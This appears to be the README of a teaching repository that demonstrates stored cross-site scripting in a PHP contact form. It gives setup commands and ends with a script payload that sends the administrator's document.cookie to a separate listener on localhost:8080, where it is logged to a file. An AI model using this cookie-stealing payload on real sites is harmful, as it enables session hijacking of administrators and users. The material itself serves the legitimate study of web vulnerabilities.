This repository is a simple example of a XSS vulnerability on a PHP website.
This try to represent a tipical contact form on a website, where the user can send a message to the website administrator. The administrator have a page where he can read all the messages sent by the users.
-
Clone the repository
-
Launch the docker container with the following command:
docker build -t xss-vulnerability .
docker run -p 80:80 --name xss-vulnerability xss-vulnerability- Open your browser and go to
http://localhost
-
Clone the repository
-
Install PHP
-
Run the following command:
php -S localhost:80- Open your browser and go to
http://localhost:80
-
Open your browser and go to
http://localhost -
Lanuch a PHP server with the following command:
php -S localhost:8080- Now fill the form with the following payload:
<script> new Image().src="http://localhost:8080/cookie-hijacking.php?cookie="+document.cookie; </script>- Click on the "Admin" link and you will see the cookie of the administrator in the terminal where you launched the PHP server and in the
cookies.txtfile.